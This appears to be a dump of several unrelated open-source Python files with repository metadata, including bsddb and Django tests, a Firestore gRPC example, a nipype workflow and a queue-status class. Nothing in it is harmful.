return cursor_py3k(self._db, txn=txn, flags=flags)
def join(self, cursor_list) :
cursor_list = [i._dbcursor for i in cursor_list]
return dup_cursor_py3k(self._db.join(cursor_list))
class DBEnv_py3k(object) :
def __init__(self, *args, **kwargs) :
self._dbenv = bsddb._db.DBEnv_orig(*args, **kwargs)
def __getattr__(self, v) :
return getattr(self._dbenv, v)
def log_cursor(self, flags=0) :
return logcursor_py3k(self._dbenv)
def get_lg_dir(self) :
return self._dbenv.get_lg_dir().decode(charset)
def get_tmp_dir(self) :
return self._dbenv.get_tmp_dir().decode(charset)
def get_data_dirs(self) :
return tuple(
(i.decode(charset) for i in self._dbenv.get_data_dirs()))
class DBSequence_py3k(object) :
def __init__(self, db, *args, **kwargs) :
self._db=db
self._dbsequence = bsddb._db.DBSequence_orig(db._db, *args, **kwargs)
def __getattr__(self, v) :
return getattr(self._dbsequence, v)
def open(self, key, *args, **kwargs) :
return self._dbsequence.open(bytes(key, charset), *args, **kwargs)
def get_key(self) :
return self._dbsequence.get_key().decode(charset)
def get_dbp(self) :
return self._db
bsddb._db.DBEnv_orig = bsddb._db.DBEnv
bsddb._db.DB_orig = bsddb._db.DB
if bsddb.db.version() <= (4, 3) :
bsddb._db.DBSequence_orig = None
else :
bsddb._db.DBSequence_orig = bsddb._db.DBSequence
def do_proxy_db_py3k(flag) :
flag2 = do_proxy_db_py3k.flag
do_proxy_db_py3k.flag = flag
if flag :
bsddb.DBEnv = bsddb.db.DBEnv = bsddb._db.DBEnv = DBEnv_py3k
bsddb.DB = bsddb.db.DB = bsddb._db.DB = DB_py3k
bsddb._db.DBSequence = DBSequence_py3k
else :
bsddb.DBEnv = bsddb.db.DBEnv = bsddb._db.DBEnv = bsddb._db.DBEnv_orig
bsddb.DB = bsddb.db.DB = bsddb._db.DB = bsddb._db.DB_orig
bsddb._db.DBSequence = bsddb._db.DBSequence_orig
return flag2
do_proxy_db_py3k.flag = False
do_proxy_db_py3k(True)
try:
# For Pythons w/distutils pybsddb
from bsddb3 import db, dbtables, dbutils, dbshelve, \
hashopen, btopen, rnopen, dbobj
except ImportError:
# For Python 2.3
from bsddb import db, dbtables, dbutils, dbshelve, \
hashopen, btopen, rnopen, dbobj
try:
from bsddb3 import test_support
except ImportError:
if sys.version_info[0] < 3 :
from test import test_support
else :
from test import support as test_support
try:
if sys.version_info[0] < 3 :
from threading import Thread, currentThread
del Thread, currentThread
else :
from threading import Thread, current_thread
del Thread, current_thread
have_threads = True
except ImportError:
have_threads = False
verbose = 0
if 'verbose' in sys.argv:
verbose = 1
sys.argv.remove('verbose')
if 'silent' in sys.argv: # take care of old flag, just in case
verbose = 0
sys.argv.remove('silent')
def print_versions():
print
print '-=' * 38
print db.DB_VERSION_STRING
print 'bsddb.db.version(): %s' % (db.version(), )
if db.version() >= (5, 0) :
print 'bsddb.db.full_version(): %s' %repr(db.full_version())
print 'bsddb.db.__version__: %s' % db.__version__
print 'bsddb.db.cvsid: %s' % db.cvsid
# Workaround for allowing generating an EGGs as a ZIP files.
suffix="__"
print 'py module: %s' % getattr(bsddb, "__file"+suffix)
print 'extension module: %s' % getattr(bsddb, "__file"+suffix)
print 'python version: %s' % sys.version
print 'My pid: %s' % os.getpid()
print '-=' * 38
def get_new_path(name) :
get_new_path.mutex.acquire()
try :
import os
path=os.path.join(get_new_path.prefix,
name+"_"+str(os.getpid())+"_"+str(get_new_path.num))
get_new_path.num+=1
finally :
get_new_path.mutex.release()
return path
def get_new_environment_path() :
path=get_new_path("environment")
import os
try:
os.makedirs(path,mode=0700)
except os.error:
test_support.rmtree(path)
os.makedirs(path)
return path
def get_new_database_path() :
path=get_new_path("database")
import os
if os.path.exists(path) :
os.remove(path)
return path
# This path can be overriden via "set_test_path_prefix()".
import os, os.path
get_new_path.prefix=os.path.join(os.environ.get("TMPDIR",
os.path.join(os.sep,"tmp")), "z-Berkeley_DB")
get_new_path.num=0
def get_test_path_prefix() :
return get_new_path.prefix
def set_test_path_prefix(path) :
get_new_path.prefix=path
def remove_test_path_directory() :
test_support.rmtree(get_new_path.prefix)
if have_threads :
import threading
get_new_path.mutex=threading.Lock()
del threading
else :
class Lock(object) :
def acquire(self) :
pass
def release(self) :
pass
get_new_path.mutex=Lock()
del Lock
class PrintInfoFakeTest(unittest.TestCase):
def testPrintVersions(self):
print_versions()
# This little hack is for when this module is run as main and all the
# other modules import it so they will still be able to get the right
# verbose setting. It's confusing but it works.
if sys.version_info[0] < 3 :
import test_all
test_all.verbose = verbose
else :
import sys
print >>sys.stderr, "Work to do!"
def suite(module_prefix='', timing_check=None):
test_modules = [
'test_associate',
'test_basics',
'test_dbenv',
'test_db',
'test_compare',
'test_compat',
'test_cursor_pget_bug',
'test_dbobj',
'test_dbshelve',
'test_dbtables',
'test_distributed_transactions',
'test_early_close',
'test_fileid',
'test_get_none',
'test_join',
'test_lock',
'test_misc',
'test_pickle',
'test_queue',
'test_recno',
'test_replication',
'test_sequence',
'test_thread',
]
alltests = unittest.TestSuite()
for name in test_modules:
#module = __import__(name)
# Do it this way so that suite may be called externally via
# python's Lib/test/test_bsddb3.
module = __import__(module_prefix+name, globals(), locals(), name)
alltests.addTest(module.test_suite())
if timing_check:
alltests.addTest(unittest.makeSuite(timing_check))
return alltests
def test_suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(PrintInfoFakeTest))
return suite
if __name__ == '__main__':
print_versions()
unittest.main(defaultTest='suite')
|
Jeff-Tian/mybnb
|
Python27/Lib/bsddb/test/test_all.py
|
Python
|
apache-2.0
| 19,765
| 0.011131
|
# -*- coding: utf-8 -*-
from distutils.core import setup
import os.path
classifiers = [
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: OSI Approved :: GNU Library or Lesser General Public License (LGPL)",
"Operating System :: OS Independent",
"Topic :: Software Development :: Libraries :: Python Modules",
]
def read(fname):
fname = os.path.join(os.path.dirname(__file__), fname)
return open(fname).read().strip()
def read_files(*fnames):
return '\r\n\r\n\r\n'.join(map(read, fnames))
setup(
name = 'icall',
version = '0.3.4',
py_modules = ['icall'],
description = 'Parameters call function, :-)',
long_description = read_files('README.rst', 'CHANGES.rst'),
author = 'huyx',
author_email = 'ycyuxin@gmail.com',
url = 'https://github.com/huyx/icall',
keywords = ['functools', 'function', 'call'],
classifiers = classifiers,
)
|
huyx/icall
|
setup.py
|
Python
|
lgpl-3.0
| 1,026
| 0.024366
|
#! /usr/bin/python
import sys
import os
import json
import grpc
import time
import subprocess
from google.oauth2 import service_account
import google.oauth2.credentials
import google.auth.transport.requests
import google.auth.transport.grpc
from google.firestore.v1beta1 import firestore_pb2
from google.firestore.v1beta1 import firestore_pb2_grpc
from google.firestore.v1beta1 import document_pb2
from google.firestore.v1beta1 import document_pb2_grpc
from google.firestore.v1beta1 import common_pb2
from google.firestore.v1beta1 import common_pb2_grpc
from google.firestore.v1beta1 import write_pb2
from google.firestore.v1beta1 import write_pb2_grpc
from google.protobuf import empty_pb2
from google.protobuf import timestamp_pb2
def first_message(database, write):
messages = [
firestore_pb2.WriteRequest(database = database, writes = [])
]
for msg in messages:
yield msg
def generate_messages(database, writes, stream_id, stream_token):
# writes can be an array and append to the messages, so it can write multiple Write
# here just write one as example
messages = [
firestore_pb2.WriteRequest(database=database, writes = []),
firestore_pb2.WriteRequest(database=database, writes = [writes], stream_id = stream_id, stream_token = stream_token)
]
for msg in messages:
yield msg
def main():
fl = os.path.dirname(os.path.abspath(__file__))
fn = os.path.join(fl, 'grpc.json')
with open(fn) as grpc_file:
item = json.load(grpc_file)
creds = item["grpc"]["Write"]["credentials"]
credentials = service_account.Credentials.from_service_account_file("{}".format(creds))
scoped_credentials = credentials.with_scopes(['https://www.googleapis.com/auth/datastore'])
http_request = google.auth.transport.requests.Request()
channel = google.auth.transport.grpc.secure_authorized_channel(scoped_credentials, http_request, 'firestore.googleapis.com:443')
stub = firestore_pb2_grpc.FirestoreStub(channel)
database = item["grpc"]["Write"]["database"]
name = item["grpc"]["Write"]["name"]
first_write = write_pb2.Write()
responses = stub.Write(first_message(database, first_write))
for response in responses:
print("Received message %s" % (response.stream_id))
print(response.stream_token)
value_ = document_pb2.Value(string_value = "foo_boo")
update = document_pb2.Document(name=name, fields={"foo":value_})
writes = write_pb2.Write(update_mask=common_pb2.DocumentMask(field_paths = ["foo"]), update=update)
r2 = stub.Write(generate_messages(database, writes, response.stream_id, response.stream_token))
for r in r2:
print(r.write_results)
if __name__ == "__main__":
main()
|
GoogleCloudPlatform/grpc-gcp-python
|
firestore/examples/end2end/src/Write.py
|
Python
|
apache-2.0
| 2,967
| 0.013482
|
from ..subpackage1 import module1g
def func1h():
print('1h')
module1g.func1g()
|
autodefrost/sandbox
|
python/test_rel_import/package1/subpackage2/module1h.py
|
Python
|
apache-2.0
| 88
| 0.011364
|
# Copyright (c) 2005, California Institute of Technology
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of the California Institute of Technology nor
# the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior
# written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# Author: Andrew Straw
import UniversalLibrary as UL
BoardNum = 0
Gain = UL.BIP5VOLTS
Chan = 0
while 1:
DataValue = UL.cbAIn(BoardNum, Chan, Gain)
EngUnits = UL.cbToEngUnits(BoardNum, Gain, DataValue)
print DataValue, EngUnits
|
astraw/PyUniversalLibrary
|
examples/ulai01.py
|
Python
|
bsd-3-clause
| 1,869
| 0
|
#!/usr/bin/env python3
import os
import os.path
from nipype.interfaces.utility import IdentityInterface, Function
from nipype.interfaces.io import SelectFiles, DataSink, DataGrabber
from nipype.pipeline.engine import Workflow, Node, MapNode
from nipype.interfaces.minc import Resample, BigAverage, VolSymm
import argparse
def create_workflow(
xfm_dir,
xfm_pattern,
atlas_dir,
atlas_pattern,
source_dir,
source_pattern,
work_dir,
out_dir,
name="new_data_to_atlas_space"
):
wf = Workflow(name=name)
wf.base_dir = os.path.join(work_dir)
datasource_source = Node(
interface=DataGrabber(
sort_filelist=True
),
name='datasource_source'
)
datasource_source.inputs.base_directory = os.path.abspath(source_dir)
datasource_source.inputs.template = source_pattern
datasource_xfm = Node(
interface=DataGrabber(
sort_filelist=True
),
name='datasource_xfm'
)
datasource_xfm.inputs.base_directory = os.path.abspath(xfm_dir)
datasource_xfm.inputs.template = xfm_pattern
datasource_atlas = Node(
interface=DataGrabber(
sort_filelist=True
),
name='datasource_atlas'
)
datasource_atlas.inputs.base_directory = os.path.abspath(atlas_dir)
datasource_atlas.inputs.template = atlas_pattern
resample = MapNode(
interface=Resample(
sinc_interpolation=True
),
name='resample_',
iterfield=['input_file', 'transformation']
)
wf.connect(datasource_source, 'outfiles', resample, 'input_file')
wf.connect(datasource_xfm, 'outfiles', resample, 'transformation')
wf.connect(datasource_atlas, 'outfiles', resample, 'like')
bigaverage = Node(
interface=BigAverage(
output_float=True,
robust=False
),
name='bigaverage',
iterfield=['input_file']
)
wf.connect(resample, 'output_file', bigaverage, 'input_files')
datasink = Node(
interface=DataSink(
base_directory=out_dir,
container=out_dir
),
name='datasink'
)
wf.connect([(bigaverage, datasink, [('output_file', 'average')])])
wf.connect([(resample, datasink, [('output_file', 'atlas_space')])])
wf.connect([(datasource_xfm, datasink, [('outfiles', 'transforms')])])
return wf
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--name",
type=str,
required=True
)
parser.add_argument(
"--xfm_dir",
type=str,
required=True
)
parser.add_argument(
"--xfm_pattern",
type=str,
required=True
)
parser.add_argument(
"--source_dir",
type=str,
required=True
)
parser.add_argument(
"--source_pattern",
type=str,
required=True
)
parser.add_argument(
"--atlas_dir",
type=str,
required=True
)
parser.add_argument(
"--atlas_pattern",
type=str,
required=True
)
parser.add_argument(
"--work_dir",
type=str,
required=True
)
parser.add_argument(
"--out_dir",
type=str,
required=True
)
parser.add_argument(
'--debug',
dest='debug',
action='store_true',
help='debug mode'
)
args = parser.parse_args()
if args.debug:
from nipype import config
config.enable_debug_mode()
config.set('execution', 'stop_on_first_crash', 'true')
config.set('execution', 'remove_unnecessary_outputs', 'false')
config.set('execution', 'keep_inputs', 'true')
config.set('logging', 'workflow_level', 'DEBUG')
config.set('logging', 'interface_level', 'DEBUG')
config.set('logging', 'utils_level', 'DEBUG')
wf = create_workflow(
xfm_dir=os.path.abspath(args.xfm_dir),
xfm_pattern=args.xfm_pattern,
atlas_dir=os.path.abspath(args.atlas_dir),
atlas_pattern=args.atlas_pattern,
source_dir=os.path.abspath(args.source_dir),
source_pattern=args.source_pattern,
work_dir=os.path.abspath(args.work_dir),
out_dir=os.path.abspath(args.out_dir),
name=args.name
)
wf.run(
plugin='MultiProc',
plugin_args={
'n_procs': int(
os.environ["NCPUS"] if "NCPUS" in os.environ else os.cpu_count
)
}
)
|
carlohamalainen/volgenmodel-nipype
|
new_data_to_atlas_space.py
|
Python
|
bsd-3-clause
| 4,566
| 0
|
"""
Created on 26 Aug 2019
@author: Bruno Beloff (bruno.beloff@southcoastscience.com)
"""
from collections import OrderedDict
from enum import Enum
from scs_core.data.json import JSONReport
# --------------------------------------------------------------------------------------------------------------------
class QueueReport(JSONReport):
"""
classdocs
"""
# ----------------------------------------------------------------------------------------------------------------
@classmethod
def construct_from_jdict(cls, jdict, skeleton=False):
if not jdict:
return QueueReport(0, ClientStatus.WAITING, False)
length = jdict.get('length')
client_state = ClientStatus[jdict.get('client-state')]
publish_success = jdict.get('publish-success')
return QueueReport(length, client_state, publish_success)
# ----------------------------------------------------------------------------------------------------------------
def __init__(self, length, client_state, publish_success):
"""
Constructor
"""
self.__length = length # int or None
self.__client_state = client_state # int
self.__publish_success = publish_success # bool
# ----------------------------------------------------------------------------------------------------------------
def queue_state(self):
# client INHIBITED...
if self.client_state == ClientStatus.INHIBITED:
return QueueStatus.INHIBITED
# client WAITING...
if self.client_state == ClientStatus.WAITING:
return QueueStatus.STARTING
# client CONNECTING...
if self.client_state == ClientStatus.CONNECTING:
return QueueStatus.CONNECTING
# client CONNECTED...
if self.client_state == ClientStatus.CONNECTED:
if self.length == 0:
return QueueStatus.WAITING_FOR_DATA
if self.publish_success:
return QueueStatus.PUBLISHING
return QueueStatus.QUEUING
# unknown / error...
return QueueStatus.NONE
# ----------------------------------------------------------------------------------------------------------------
def as_json(self):
jdict = OrderedDict()
jdict['length'] = self.length
jdict['client-state'] = self.client_state.name
jdict['publish-success'] = self.publish_success
return jdict
# ----------------------------------------------------------------------------------------------------------------
@property
def length(self):
return self.__length
@length.setter
def length(self, length):
self.__length = length
@property
def client_state(self):
return self.__client_state
@client_state.setter
def client_state(self, client_state):
self.__client_state = client_state
@property
def publish_success(self):
return self.__publish_success
@publish_success.setter
def publish_success(self, publish_success):
self.__publish_success = publish_success
# ----------------------------------------------------------------------------------------------------------------
def __str__(self, *args, **kwargs):
return "QueueReport:{length:%s, client_state:%s, publish_success:%s}" % \
(self.length, self.client_state, self.publish_success)
# --------------------------------------------------------------------------------------------------------------------
class ClientStatus(Enum):
"""
classdocs
"""
NONE = 0
INHIBITED = 1
WAITING = 2
CONNECTING = 3
CONNECTED = 4
# --------------------------------------------------------------------------------------------------------------------
class QueueStatus(Enum):
"""
classdocs
"""
NONE = 1
INHIBITED = 2
STARTING = 3
CONNECTING = 4
WAITING_FOR_DATA = 5
PUBLISHING = 6
QUEUING = 7
CLEARING = 8
|
south-coast-science/scs_core
|
src/scs_core/data/queue_report.py
|
Python
|
mit
| 4,239
| 0.006841
|
#!/usr/bin/env python
import numpy as np
from scipy import special
from ..routines import median, mahalanobis, gamln, psi
from nose.tools import assert_true
from numpy.testing import assert_almost_equal, assert_equal, TestCase
class TestAll(TestCase):
def test_median(self):
x = np.random.rand(100)
assert_almost_equal(median(x), np.median(x))
def test_median2(self):
x = np.random.rand(101)
assert_equal(median(x), np.median(x))
def test_median3(self):
x = np.random.rand(10, 30, 11)
assert_almost_equal(np.squeeze(median(x,axis=1)), np.median(x,axis=1))
def test_mahalanobis0(self):
x = np.ones(100)
A = np.eye(100)
mah = 100.
f_mah = mahalanobis(x, A)
assert_almost_equal(mah, f_mah, decimal=1)
def test_mahalanobis1(self):
x = np.random.rand(100)
A = np.random.rand(100, 100)
A = np.dot(A.transpose(), A) + np.eye(100)
mah = np.dot(x, np.dot(np.linalg.inv(A), x))
f_mah = mahalanobis(x, A)
assert_almost_equal(mah, f_mah, decimal=1)
def test_mahalanobis2(self):
x = np.random.rand(100,3,4)
Aa = np.zeros([100,100,3,4])
for i in range(3):
for j in range(4):
A = np.random.rand(100,100)
A = np.dot(A.T, A)
Aa[:,:,i,j] = A
i = np.random.randint(3)
j = np.random.randint(4)
mah = np.dot(x[:,i,j], np.dot(np.linalg.inv(Aa[:,:,i,j]), x[:,i,j]))
f_mah = (mahalanobis(x, Aa))[i,j]
assert_true(np.allclose(mah, f_mah))
def test_gamln(self):
for x in (0.01+100*np.random.random(50)):
scipy_gamln = special.gammaln(x)
my_gamln = gamln(x)
assert_almost_equal(scipy_gamln, my_gamln)
def test_psi(self):
for x in (0.01+100*np.random.random(50)):
scipy_psi = special.psi(x)
my_psi = psi(x)
assert_almost_equal(scipy_psi, my_psi)
if __name__ == "__main__":
import nose
nose.run(argv=['', __file__])
|
arokem/nipy
|
nipy/labs/utils/tests/test_misc.py
|
Python
|
bsd-3-clause
| 2,093
| 0.010511
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.12 on 2017-05-25 20:11
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('anagrafica', '0046_delega_stato'),
]
operations = [
migrations.AlterIndexTogether(
name='delega',
index_together=set([('persona', 'tipo', 'stato'), ('inizio', 'fine', 'tipo', 'oggetto_id', 'oggetto_tipo'), ('tipo', 'oggetto_tipo', 'oggetto_id'), ('persona', 'inizio', 'fine', 'tipo'), ('persona', 'inizio', 'fine', 'tipo', 'stato'), ('persona', 'stato'), ('persona', 'inizio', 'fine'), ('inizio', 'fine', 'tipo'), ('persona', 'inizio', 'fine', 'tipo', 'oggetto_id', 'oggetto_tipo'), ('persona', 'tipo'), ('oggetto_tipo', 'oggetto_id'), ('inizio', 'fine', 'stato'), ('inizio', 'fine')]),
),
]
|
CroceRossaItaliana/jorvik
|
anagrafica/migrations/0047_auto_20170525_2011.py
|
Python
|
gpl-3.0
| 865
| 0.001156
|
# coding: utf-8
"""
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
from django.test import TestCase
from django.core.exceptions import ValidationError
from eventex.core.models import Speaker, Contact
class SpeakerModelTest(TestCase):
"""
Test class.
"""
def setUp(self):
"""
Test initialization.
"""
self.speaker = Speaker(
name='Davi Garcia',
slug='davi-garcia',
url='http://www.davigarcia.com.br',
description='Passionate software developer!'
)
self.speaker.save()
def test_create(self):
"""
Speaker instance must be saved.
"""
self.assertEqual(1, self.speaker.pk)
def test_unicode(self):
"""
Speaker string representation should be the name.
"""
self.assertEqual(u'Davi Garcia', unicode(self.speaker))
class ContactModelTest(TestCase):
"""
Test class.
"""
def setUp(self):
"""
Test initialization.
"""
self.speaker = Speaker.objects.create(
name='Davi Garcia',
slug='davi-garcia',
url='http://www.davigarcia.com.br',
description='Passionate software developer!'
)
def test_email(self):
"""
Speaker should have email contact.
"""
contact = Contact.objects.create(
speaker=self.speaker,
kind='E',
value='henrique@bastos.net'
)
self.assertEqual(1, contact.pk)
def test_phone(self):
"""
Speaker should have email contact.
"""
contact = Contact.objects.create(
speaker=self.speaker,
kind='P',
value='21-987654321'
)
self.assertEqual(1, contact.pk)
def test_fax(self):
"""
Speaker should have email contact.
"""
contact = Contact.objects.create(
speaker=self.speaker,
kind='F',
value='21-123456789'
)
self.assertEqual(1, contact.pk)
def test_kind(self):
"""
Contact kind must be limited to E, P or F.
"""
contact = Contact(speaker=self.speaker, kind='A', value='B')
self.assertRaises(ValidationError, contact.full_clean)
def test_unicode(self):
"""
Contact string representation should be value.
"""
contact = Contact(
speaker=self.speaker,
kind='E',
value='davivcgarcia@gmail.com')
self.assertEqual(u'davivcgarcia@gmail.com', unicode(contact))
|
davivcgarcia/wttd-15
|
eventex/core/tests/test_models_speaker_contact.py
|
Python
|
gpl-3.0
| 3,199
| 0
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.